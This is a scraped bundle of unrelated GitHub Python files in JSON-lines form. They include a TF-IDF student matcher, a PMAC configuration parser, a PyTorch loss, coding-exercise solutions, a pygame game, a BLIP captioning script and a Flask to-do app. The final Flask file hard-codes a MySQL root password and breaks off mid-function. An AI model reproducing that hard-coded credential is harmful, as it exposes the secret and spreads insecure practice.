\n","repo_name":"guillsav/Technical-Practice","sub_path":"second-largest-in-bst/second-largest.py","file_name":"second-largest.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37197743923","text":"# Import Pandas\nimport pandas as pd\n\n# Import TfIdfVectorizer from scikit-learn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Import linear_kernel\nfrom sklearn.metrics.pairwise import linear_kernel\n\nimport json # for testing\nimport clean_info as ci \nimport model_selection as ms \n\n# Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'\ntfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english')\n\n# features\n# features = ['Name', 'Major','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Interest 3','Hometown','Hometype']\n# weights = {'Name': 0, 'Major': 30, 'Class 1': 20, 'Class 2': 20, 'Class 3': 20, 'Class 4': 20, 'Interest 1': 12, 'Interest 2': 12, 'Interest 3': 12, 'Hometown': 18, 'Hometype': 0}\nfeatures = ['Name','Gender','Major','Grad Year','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Study Habits','Hometown','Campus Location','Race','Preferences']\nc_weight = 16\ni_weight = 8\nweights = {'Name': 0, 'Gender': 0, 'Major': 5, 'Grad Year': 7, \n 'Class 1': c_weight, 'Class 2': c_weight, 'Class 3': c_weight, 'Class 4': c_weight, \n 'Interest 1': i_weight, 'Interest 2': i_weight, \n 'Study Habits': 11, 'Hometown': 3, 'Campus Location': 10, 'Race': 0, 'Preferences': 0}\n\n# S = 1.8 C, L = 1.5 C, I = 0.8 C, H = 0.6 C, G = 0.5 C, M = 0.3 C\n# weights = {'Name': 0, 'Gender': 0, 'Major': 5, 'Grad Year': 7, 'Class 1': 10, 'Class 2': 10, 'Class 3': 10, 'Class 4': 10, 'Interest 1': 6, 'Interest 2': 6, 'Study Habits': 15, 'Hometown': 3, 'Campus Location': 14, 'Race': 0, 'Preferences': 0}\n\nprimary = 'Name'\n# groupby = 'Race'\ngroupby = None\n\nnum = 3\n# csv = 'Test Classes Extended.csv'\ncsv = 'Prof Clarkson Test Data - Sheet1 (1).csv'\n# csv = 'ProfileInfo.csv'\n# use_model = True \nuse_model = False \nreplace_list = ['Interest 1','Interest 2']\ndo_random = False \nrand_num = 3\n\n# minimize number of global variables\ndef convert_csv_to_matrix(csv, num):\n # Load data from csv\n metadata = pd.read_csv(csv)\n m0 = metadata[features]\n\n for feature in replace_list:\n m0[feature] = m0[feature].apply(ci.key_replace)\n \n m0 = m0.reset_index()\n group_dict = {}\n matches = pd.DataFrame(columns=features + ['index'])\n ones = []\n\n def func_pairs(group):\n # apply clean_df function to features\n m1 = group.copy()\n m1 = ci.clean_df(m1, features, primary)\n \n if use_model:\n cosine_sim = ms.construct_similarity(m1)\n else:\n # BEGINNING ------------------------------------------------------------\n m1 = m1.assign(score = [''] * len(m1))\n for feature in features:\n if feature in weights:\n for i in range(weights[feature]):\n m1['score'] = m1['score'] + \" \" + m1[feature]\n else:\n m1['score'] = m1['score'] + \" \" + m1[feature]\n \n #Construct the required TF-IDF matrix by fitting and transforming the data\n tfidf_matrix = tfidf.fit_transform(m1['score'])\n\n # Compute the cosine similarity matrix\n cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n # END -----------------------------------------------------------------\n \n #Construct a reverse map of indices and employee names\n indices = pd.Series(group.index, index=group['index']).drop_duplicates()\n\n return get_pairs(group['index'].sample(frac=1), indices, cosine_sim, group, num)\n\n if groupby is not None:\n courses = m0[groupby].unique() # list of all unique department names\n \n for course in courses:\n group = (m0[m0[groupby] == course]).reset_index().drop('level_0', axis=1)\n # keep track of groups with only one member\n\n if len(group) == 1:\n ones.append(group)\n else:\n matches = pd.concat([matches, func_pairs(group)], sort=False)\n \n if len(ones) != 0:\n if len(ones) == 1:\n for match in matches:\n if len(ones) == 0: break\n else:\n while len(match) < num:\n if len(ones) != 0:\n match.append(ones.pop(0)[primary])\n else: break\n if len(ones) > 0:\n matches[0].append(ones.pop(0))\n else:\n df = pd.DataFrame(columns=features + ['index'])\n \n for one in ones:\n df = df.append(one, sort=False)\n df = df.reset_index().drop('level_0', axis=1)\n matches = pd.concat([matches, func_pairs(df)], sort=False)\n else:\n matches = func_pairs(m0)\n \n return matches\n\n# Function that takes in movie title as input and outputs most similar movies\ndef get_recommendations(name, indices, cosine_sim, list_to_remove, m0):\n # Get the index of the employee that matches the name\n idx = indices[name]\n\n # Get the pairwsie similarity scores of all employees with that employee\n sim_scores = list(enumerate(cosine_sim[idx]))\n \n # Sort the employees based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n # Get the employee indices\n emp_indices = []\n emp_sims = []\n for i in sim_scores:\n if (len(emp_indices) == rand_num): break\n if i[0] not in list_to_remove and i[0] != idx:\n emp_indices.append(i[0])\n emp_sims.append(i[1])\n\n # Return the top 10 most similar employee not already paired\n result = m0.iloc[emp_indices]\n result = result.assign(Similarity = emp_sims) # still need this?\n return result \n\nimport random \ndef get_random(mylist, num): # num = number of people per group\n if (len(mylist) >= num):\n inds = list(mylist.index)\n result = pd.DataFrame(columns=features)\n if do_random:\n rand_inds = random.sample(inds, num-1)\n for i in rand_inds:\n result = pd.concat([result, mylist[mylist.index == i]], sort=False)\n else:\n for i in range(0, num-1):\n result = pd.concat([result, mylist[mylist.index == inds[i]]], sort=False)\n else:\n result = mylist\n return result\n\n# semi-greedy algorithm\ndef get_pairs(emplist, indices, cosine_sim, m0, num):\n pairs = pd.DataFrame(columns=features + ['index'])\n list_to_remove = []\n \n for e in emplist:\n if indices[e] not in list_to_remove:\n partner = list(get_random(get_recommendations(e, indices, cosine_sim, list_to_remove, m0), num)['index'])\n name0 = m0[m0['index'] == e].iloc[0]\n pairs = pairs.append(m0[m0['index'] == e].iloc[0])\n \n list_to_remove.append(indices[e])\n for p in partner:\n pairs = pairs.append(m0[m0['index'] == p].iloc[0])\n list_to_remove.append(indices[p])\n\n data = [['-'] * (len(features)+1)]\n data2 = [['+'] * (len(features)+1)]\n extra = pd.DataFrame(data, columns=features + ['index'])\n extra2 = pd.DataFrame(data2, columns=features + ['index'])\n pairs = pd.concat([pairs, extra, extra2], sort=False)\n \n list_to_remove.sort(reverse=True)\n return pairs\n\ndf = convert_csv_to_matrix(csv, num)\nprint(df)\n# print(\"Done\")\ndf.to_csv('testing.csv', index=False)","repo_name":"ALai2/AWS-Flask-ML-App","sub_path":"recommender/work_with_duplicates.py","file_name":"work_with_duplicates.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5450159417","text":"import getopt\nimport logging\nimport sys\nfrom typing import Dict\n\nfrom dls_pmacanalyse import __version__\nfrom dls_pmacanalyse.errors import ArgumentError, ConfigError\nfrom dls_pmacanalyse.pmac import Pmac\nfrom dls_pmacanalyse.pmacparser import PmacParser\nfrom dls_pmacanalyse.pmacvariables import (\n PmacIVariable,\n PmacMsIVariable,\n PmacMVariable,\n PmacPVariable,\n PmacQVariable,\n)\n\nlog = logging.getLogger(__name__)\n\n\nclass GlobalConfig(object):\n \"\"\"A single instance of this class contains the global configuration.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n self.verbose = False\n self.backupDir = None\n self.writeAnalysis = True\n self.comments = False\n self.configFile = None\n self.resultsDir = \"pmacAnalysis\"\n self.onlyPmacs = None\n self.includePaths = None\n self.checkPositions = False\n self.debug = False\n self.fixfile = None\n self.unfixfile = None\n self.pmacs: Dict[str, Pmac] = {}\n\n def createOrGetPmac(self, name: str):\n if name not in self.pmacs:\n self.pmacs[name] = Pmac(name)\n return self.pmacs[name]\n\n def processArguments(self):\n \"\"\"Process the command line arguments. Returns False\n if the program is to print(the help and exit.\"\"\"\n try:\n opts, args = getopt.gnu_getopt(\n sys.argv[1:],\n \"vh\",\n [\n \"help\",\n \"verbose\",\n \"backup=\",\n \"pmac=\",\n \"ts=\",\n \"tcpip=\",\n \"geobrick\",\n \"vmepmac\",\n \"reference=\",\n \"comparewith=\",\n \"resultsdir=\",\n \"nocompare=\",\n \"only=\",\n \"include=\",\n \"nofactorydefs\",\n \"macroics=\",\n \"checkpositions\",\n \"debug\",\n \"comments\",\n \"fixfile=\",\n \"unfixfile=\",\n \"loglevel=\",\n \"version\",\n ],\n )\n except getopt.GetoptError as err:\n raise ArgumentError(str(err))\n globalPmac = Pmac(\"global\")\n curPmac = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n return False\n elif o in (\"-v\", \"--verbose\"):\n self.verbose = True\n elif o == \"--backup\":\n self.backupDir = a\n elif o == \"--comments\":\n self.comments = True\n elif o == \"--pmac\":\n curPmac = self.createOrGetPmac(a)\n curPmac.copyNoComparesFrom(globalPmac)\n elif o == \"--ts\":\n parts = a.split(\":\")\n if len(parts) != 2:\n raise ArgumentError(\"Bad terminal server argument\")\n elif curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setProtocol(parts[0], parts[1], True)\n elif o == \"--tcpip\":\n parts = a.split(\":\")\n if len(parts) != 2:\n raise ArgumentError(\"Bad TCP/IP argument\")\n elif curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setProtocol(parts[0], parts[1], False)\n elif o == \"--geobrick\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setGeobrick(True)\n elif o == \"--debug\":\n self.debug = True\n elif o == \"--vmepmac\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setGeobrick(False)\n elif o == \"--nofactorydefs\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setNoFactoryDefs()\n elif o == \"--reference\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setReference(a)\n elif o == \"--fixfile\":\n self.fixfile = a\n elif o == \"--unfixfile\":\n self.unfixfile = a\n elif o == \"--comparewith\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setCompareWith(a)\n elif o == \"--resultsdir\":\n self.resultsDir = a\n elif o == \"--nocompare\":\n parser = PmacParser(a, None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n if curPmac is None:\n globalPmac.setNoCompare(var)\n else:\n curPmac.setNoCompare(var)\n start += increment\n count -= 1\n elif o == \"--compare\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n parser = PmacParser(a, None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n curPmac.clearNoCompare(var)\n start += increment\n count -= 1\n elif o == \"--only\":\n if self.onlyPmacs is None:\n self.onlyPmacs = []\n self.onlyPmacs.append(a)\n elif o == \"--include\":\n self.includePaths = a\n elif o == \"--macroics\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setNumMacroStationIcs(int(a))\n elif o == \"--checkpositions\":\n self.checkPositions = True\n elif o == \"--loglevel\":\n numeric_level = getattr(logging, str(a).upper(), None)\n log.setLevel(numeric_level)\n elif o == \"--version\":\n print(__version__)\n exit(0)\n if len(args) > 1:\n raise ArgumentError(\"Too many arguments.\")\n if len(args) == 1:\n self.configFile = args[0]\n return True\n\n def processConfigFile(self):\n \"\"\"Process the configuration file.\"\"\"\n if self.configFile is None:\n return\n file = open(self.configFile, \"r\")\n if file is None:\n raise ConfigError(\"Could not open config file: %s\" % self.configFile)\n globalPmac = Pmac(\"global\")\n curPmac = None\n for line in file:\n words = line.split(\";\", 1)[0].strip().split()\n if len(words) >= 1:\n if words[0].lower() == \"pmac\" and len(words) == 2:\n curPmac = self.createOrGetPmac(words[1])\n curPmac.copyNoComparesFrom(globalPmac)\n elif (\n words[0].lower() == \"ts\" and len(words) == 3 and curPmac is not None\n ):\n curPmac.setProtocol(words[1], int(words[2]), True)\n elif (\n words[0].lower() == \"tcpip\"\n and len(words) == 3\n and curPmac is not None\n ):\n curPmac.setProtocol(words[1], int(words[2]), False)\n elif (\n words[0].lower() == \"geobrick\"\n and len(words) == 1\n and curPmac is not None\n ):\n curPmac.setGeobrick(True)\n elif (\n words[0].lower() == \"nofactorydefs\"\n and len(words) == 1\n and curPmac is not None\n ):\n curPmac.setNoFactoryDefs()\n elif (\n words[0].lower() == \"reference\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setReference(words[1])\n elif (\n words[0].lower() == \"comparewith\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setCompareWith(words[1])\n elif words[0].lower() == \"resultsdir\" and len(words) == 2:\n self.resultsDir = words[1]\n elif words[0].lower() == \"include\" and len(words) == 2:\n self.includePaths = words[1]\n elif words[0].lower() == \"backup\" and len(words) == 2:\n self.backupDir = words[1]\n elif words[0].lower() == \"comments\" and len(words) == 1:\n self.comments = True\n elif words[0].lower() == \"nocompare\" and len(words) == 2:\n parser = PmacParser([words[1]], None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n if curPmac is None:\n globalPmac.setNoCompare(var)\n else:\n curPmac.setNoCompare(var)\n start += increment\n count -= 1\n elif (\n words[0].lower() == \"compare\"\n and len(words) == 2\n and curPmac is not None\n ):\n parser = PmacParser([words[1]], None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n curPmac.clearNoCompare(var)\n start += increment\n count -= 1\n elif (\n words[0].lower() == \"macroics\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setNumMacroStationIcs(int(words[1]))\n else:\n raise ConfigError(\"Unknown configuration: %s\" % repr(line))\n\n def makeVars(self, varType, nodeList, n):\n \"\"\"Makes a variable of the correct type.\"\"\"\n result = []\n if varType == \"i\":\n result.append(PmacIVariable(n))\n elif varType == \"p\":\n result.append(PmacPVariable(n))\n elif varType == \"m\":\n result.append(PmacMVariable(n))\n elif varType == \"ms\":\n for ms in nodeList:\n result.append(PmacMsIVariable(ms, n))\n elif varType == \"&\":\n for cs in nodeList:\n result.append(PmacQVariable(cs, n))\n else:\n raise ConfigError(\"Cannot decode variable type %s\" % repr(varType))\n return result\n","repo_name":"DiamondLightSource/dls-pmac-analyse","sub_path":"src/dls_pmacanalyse/globalconfig.py","file_name":"globalconfig.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10915343779","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Dist import Dist\n\ndef mixup_criterion(pred, y_a, y_b, lam):\n return lam * F.cross_entropy(pred, y_a) + (1 - lam) * F.cross_entropy(pred, y_b)\n\ndef mse_loss(pred, y_a, y_b, lam):\n return lam * (F.mse_loss(pred, y_a) / 2) + (1 - lam) * (F.mse_loss(pred, y_b) / 2)\n\nclass GCPLoss(nn.CrossEntropyLoss):\n def __init__(self, **options):\n super(GCPLoss, self).__init__()\n self.weight_pl = options['weight_pl']\n self.temp = options['temp']\n self.Dist = Dist(num_classes=options['num_classes'], feat_dim=options['feat_dim']) # \n\n def forward(self, x, y, labels=None, targets_a=None, targets_b=None, lam=None, mixup=0):\n dist = self.Dist(x)\n logits = F.softmax(-dist, dim=1)\n if labels is None: return logits, 0\n\n if mixup == 0:\n loss = F.cross_entropy(-dist / self.temp, labels)\n center_batch = self.Dist.centers[labels, :]\n loss_r = F.mse_loss(x, center_batch) / 2\n\n elif mixup == 1:\n loss = mixup_criterion(-dist, targets_a, targets_b, lam)\n center_batch_a = self.Dist.centers[targets_a, :]\n center_batch_b = self.Dist.centers[targets_b, :]\n loss_r = mse_loss(x, center_batch_a, center_batch_b, lam)\n\n loss = loss + self.weight_pl * loss_r\n return logits, loss","repo_name":"DevD1092/ood-skin-lesion","sub_path":"GCPLoss.py","file_name":"GCPLoss.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"18481009125","text":"class Solution:\n def findCircleNum(self, isConnected: [[int]]) -> int:\n province_count = 0\n self.visited = set()\n \n for i in range(len(isConnected)):\n if i not in self.visited:\n self.province_dfs(i, isConnected)\n province_count += 1\n \n return province_count\n \n \n def province_dfs(self, i: int, isConnected: [[int]]):\n self.visited.add(i)\n for j in range(len(isConnected)):\n if j not in self.visited and i != j and isConnected[i][j] == 1:\n self.province_dfs(j, isConnected)\n \n return\n ","repo_name":"thydrdy/competitive_programming","sub_path":"leetcode/number of provinces.py","file_name":"number of provinces.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71129544836","text":"import sys\nn = int(sys.stdin.readline())\nstack = []\nresult = []\ncurrent = 1\n\nfor _ in range(n):\n x = int(input())\n while len(stack) == 0 or stack[-1] < x:\n stack.append(current)\n current += 1\n result.append('+')\n if stack[-1] == x:\n stack.pop()\n result.append('-')\n else:\n result = ['No']\n break\n\nfor x in result:\n print(x)\n","repo_name":"jiseungmin/Algorithm","sub_path":"Internet lecture/Algorithm_BaekJoon/스택수열.py","file_name":"스택수열.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32518179636","text":"import pandas as pd\nfrom datetime import datetime, timedelta\nimport sys\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\nr=pd.read_csv(\"drug_exposure.csv\")\ns=r.loc[:,[\"person_id\",\"drug_concept_id\",\"drug_exposure_start_date\",\"drug_exposure_end_date\"]]\nf=s[s[\"person_id\"].isin([\"1891866\"])]\nla=pd.DatetimeIndex(f[\"drug_exposure_end_date\"])-pd.DatetimeIndex(f[\"drug_exposure_start_date\"])\nnew=f.assign(days = la)\nlast=new.sort_values('days',ascending=False)\ndel last['days']\nsys.stdout=open('4답.txt','w')\nprint(last)\n\n\n\n\n\n\n","repo_name":"crownbrown1/data","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23616609171","text":"s=open('B.in').read()\nout=open('B.out','w')\na=s.split('\\n')[1:]\nfor ia in xrange(len(a)):\n if not a[ia]: continue\n d=a[ia].split()\n nc=int(d[0])\n ct = d[1:nc+1]\n c=[]\n for i in ct:\n c.append(i)\n c.append(i[1]+i[0]+i[2])\n no = int(d[nc+1])\n ot = d[nc+2:nc+no+2]\n o=list()\n for i in ot:\n o.append(i)\n o.append(i[1]+i[0]) \n l=list(d[-1])\n h=list()\n h.append(l[0])\n for j in l[1:]:\n 'print j,h'\n for co in c:\n if h:\n if h[-1]==co[0] and j==co[1]:\n h[-1]=co[2]\n break\n else:\n for oo in o:\n if(oo[0]==j and oo[1] in h):\n h=[]\n break\n else:\n h.append(j)\n out.write('Case #{0}: '.format(ia+1)+str(h).replace('\\'','')+'\\n')\nout.close()\n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/1183.py","file_name":"1183.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18700997265","text":"# Brian Bowles, Assignment 6, February 28, 2015.\nimport os,sys\nimport pygame\n\nPLAYER = 'smallface.png'\nFALCON = 'falcon.png'\n\nGREEN = (0, 255, 0)\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self,image_file,location):\n self.image = pygame.image.load(image_file).convert()\n self.rect = self.image.get_rect()\n self.rect.topleft = location\n self.speed = 3\n\n def move(self):\n self.rect.x += self.speed\n \n if self.rect.right > 640:\n self.speed *= -1\n if self.rect.left < 0:\n self.speed *= -1\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, location, speed, image_file):\n self.image = pygame.image.load(image_file).convert_alpha()\n self.speed = speed\n self.rect = self.image.get_rect()\n self.rect.topleft = location\n self.keydownA = False\n self.keydownD = False\n self.keydownS = False\n self.keydownW = False\n\n def detectMoving(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit();sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n self.keydownA = True\n if event.key == pygame.K_d:\n self.keydownD = True\n if event.key == pygame.K_s:\n self.keydownS = True\n if event.key == pygame.K_w:\n self.keydownW = True\n if event.key == pygame.K_q:\n pygame.quit();sys.exit()\n\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n self.keydownA = False\n if event.key == pygame.K_d:\n self.keydownD = False\n if event.key == pygame.K_s:\n self.keydownS = False\n if event.key == pygame.K_w:\n self.keydownW = False\n\n def move(self):\n if self.keydownA == True and self.rect.left > 0:\n self.rect.x -= self.speed\n if self.keydownD == True and self.rect.right < 640:\n self.rect.x += self.speed\n if self.keydownW == True and self.rect.top > 0 :\n self.rect.y -= self.speed\n if self.keydownS == True and self.rect.bottom < 480:\n self.rect.y += self.speed\n \nclass Control:\n def __init__(self):\n self.falcon1 = Box(FALCON,(400,200))\n self.falcon2 = Box(FALCON,(400,25))\n self.falcon3 = Box(FALCON,(400,375))\n self.player = Player([250,350], 3, PLAYER)\n self.hits = 0\n self.message = \"HITS: \"\n self.font = pygame.font.Font(None, 30)\n self.text = self.font.render(self.message, 1, (0, 0, 255))\n self.isColliding = False\n SCREEN.blit(self.text, (300, 0))\n \n def main(self):\n self.player.detectMoving()\n self.player.move()\n self.falcon1.move()\n self.falcon2.move()\n self.falcon3.move()\n SCREEN.fill(GREEN)\n SCREEN.blit(self.falcon1.image, self.falcon1.rect)\n SCREEN.blit(self.falcon2.image, self.falcon2.rect)\n SCREEN.blit(self.falcon3.image, self.falcon3.rect)\n SCREEN.blit(self.player.image, self.player.rect)\n\n if self.player.rect.colliderect(self.falcon1.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n elif self.player.rect.colliderect(self.falcon2.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n elif self.player.rect.colliderect(self.falcon3.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n else:\n self.isColliding = False\n self.text = self.font.render(self.message + \" \" + str(self.hits), 1, (0, 0, 255))\n SCREEN.blit(self.text, (320, 0))\n pygame.display.flip()\n\nif __name__ == \"__main__\":\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.init()\n pygame.display.set_caption(\"Brian's Collision Detection Game\")\n SCREEN = pygame.display.set_mode((640, 480))\n \n run = Control()\n clock = pygame.time.Clock()\n while 1:\n run.main()\n clock.tick(64)\n","repo_name":"bowles123/CS-3430-Projects","sub_path":"Assignment6/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4986688560","text":"# # import requests\n# # from PIL import Image\n# # from transformers import BlipProcessor, BlipForConditionalGeneration\n# # from PIL import Image\n# # from TTS import capture_image\n\n\n# # def local_image_to_pil(path):\n# # img = Image.open(path).convert('RGB')\n# # return img\n\n\n# # local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n# # processor = BlipProcessor.from_pretrained(local_model_dir)\n# # model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n\n# # img_path =capture_image()\n\n# # # replace with your actual image path\n# # img_url = local_image_to_pil(img_path)\n# # raw_image = img_url\n\n\n# # # raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')\n\n# # # conditional image captioning\n# # text = \"a photography of\"\n# # inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n# # out = model.generate(**inputs)\n# # print(processor.decode(out[0], skip_special_tokens=True))\n# # # >>> a photography of a woman and her dog\n\n# # # unconditional image captioning\n# # inputs = processor(raw_image, return_tensors=\"pt\")\n\n# # out = model.generate(**inputs)\n# # print(processor.decode(out[0], skip_special_tokens=True))\n# # # >>> a woman sitting on the beach with her dog\n\n\n# import requests\n# from PIL import Image\n# from transformers import BlipProcessor, BlipForConditionalGeneration\n# from TTS import capture_image, speak\n\n\n# def local_image_to_pil(path):\n# img = Image.open(path).convert('RGB')\n# return img\n\n\n# def generate_image_captions():\n# local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n# try:\n# processor = BlipProcessor.from_pretrained(local_model_dir)\n# model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n# img_path = capture_image()\n# img_url = local_image_to_pil(img_path)\n# raw_image = img_url\n\n# text = \"a photography of\"\n# inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n# out = model.generate(**inputs)\n# caption = processor.decode(out[0], skip_special_tokens=True)\n# print(caption)\n\n# speak(\"Caption generated: \" + caption)\n\n\n# user_approval = input(\"Do you want to retake the image? (Yes/No): \")\n# if user_approval.lower() in [\"yes\", \"y\"]:\n# generate_image_captions()\n\n# except Exception as e:\n# speak(\"An error occurred: \" + str(e))\n# user_approval = input(\"Do you want to retake the image? (Yes/No): \")\n# if user_approval.lower() in [\"yes\", \"y\"]:\n# generate_image_captions()\n# else:\n# speak(\"Caption generation failed.\")\n\n\n# generate_image_captions()\n\n\nimport requests\nfrom PIL import Image\nfrom transformers import BlipProcessor, BlipForConditionalGeneration\nfrom TTS import capture_image, speak\nfrom langchain import OpenAI, LLMChain, PromptTemplate\nfrom langchain.memory import ConversationBufferWindowMemory\nimport speech_recognition as sr\nimport os\nfrom dotenv import find_dotenv, load_dotenv\n\ndotenv_path= find_dotenv()\nload_dotenv(dotenv_path)\nOPENAI_API_KEY = os.getenv(\"OPENAI_API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = OPENAI_API_KEY\n\ndef _approve(_input: str) -> bool:\n r = sr.Recognizer()\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 200\n r.pause_threshold = 0.5\n msg = (\n \"Do you approve of the following input? \"\n \"Please say 'Yes' or 'No'.\"\n )\n msg += \"\\n\\n\" + _input + \"\\n\"\n speak(msg)\n try:\n audio = r.listen(source, timeout=50, phrase_time_limit=50)\n resp = r.recognize_google(audio)\n return resp.lower() in (\"yes\", \"y\")\n except Exception as e:\n speak(f\"An error occurred while recognizing your response: {e}\")\n return False\n\n\ntemplate = \"\"\"\nInterpreting the Image Caption:\n\nCaption: {caption}\n\nPlease contribute your insights, interpretations, or clarifications to help unravel the meaning behind the generated caption.\n\nLet's embark on this meaningful journey together, embracing the opportunities presented by image captioning and the power of ChatGPT!\n\n\"\"\"\n\nprompt = PromptTemplate(input_variables=[\"caption\"], template=template)\nchatgpt_chain = LLMChain(\n llm=OpenAI(temperature=0),\n prompt=prompt,\n verbose=True,\n memory=ConversationBufferWindowMemory(k=2),\n)\n\n\ndef local_image_to_pil(path):\n img = Image.open(path).convert('RGB')\n return img\n\n\ndef generate_image_captions():\n local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n try:\n processor = BlipProcessor.from_pretrained(local_model_dir)\n model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n img_path = capture_image()\n img_url = local_image_to_pil(img_path)\n raw_image = img_url\n\n text = \"a photography of\"\n inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n out = model.generate(**inputs)\n caption = processor.decode(out[0], skip_special_tokens=True)\n print(caption)\n\n speak(\"Caption generated: \" + caption)\n\n if _approve(\"Do you want to retake the image?\"):\n generate_image_captions()\n else:\n interpretation = chatgpt_chain.predict(caption=caption)\n speak(\"Interpretation:\")\n speak(interpretation)\n\n except Exception as e:\n speak(\"An error occurred: \" + str(e))\n if _approve(\"Do you want to retake the image?\"):\n generate_image_captions()\n else:\n speak(\"Caption generation failed.\")\n\n\n\n","repo_name":"marvins56/GPT-4-BLIND-PERSONS","sub_path":"hackathon/cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39886417747","text":"from flask import *\r\nimport mysql.connector\r\n\r\napp = Flask(__name__)\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"Hp7584*529903*\",\r\n database=\"web\"\r\n)\r\n\r\nmycursor = mydb.cursor()\r\n\r\n\r\ndef get_key(dict, pkey):\r\n values = []\r\n for key, value in dict.items():\r\n if pkey == value:\r\n values.append(int(key) - 1)\r\n return values\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef hello_world():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/login\")\r\ndef login():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/tareas\", methods=[\"GET\", \"POST\"])\r\ndef tareas():\r\n mycursor.execute(\"SELECT nota FROM tareas WHERE usuario='root' \")\r\n result = mycursor.fetchall()\r\n tasks = [i[0] for i in result]\r\n if request.method == \"POST\":\r\n values = request.form.to_dict()\r\n if \"bt_add\" in request.form:\r\n sql = \"INSERT INTO tareas (usuario, nota) VALUES (%s, %s)\"\r\n val = (\"root\", values[\"task_to_add\"])\r\n mycursor.execute(sql,val)\r\n else:\r\n keys = get_key(values, \"on\")\r\n for index in keys:\r\n del_val = tasks[index]\r\n 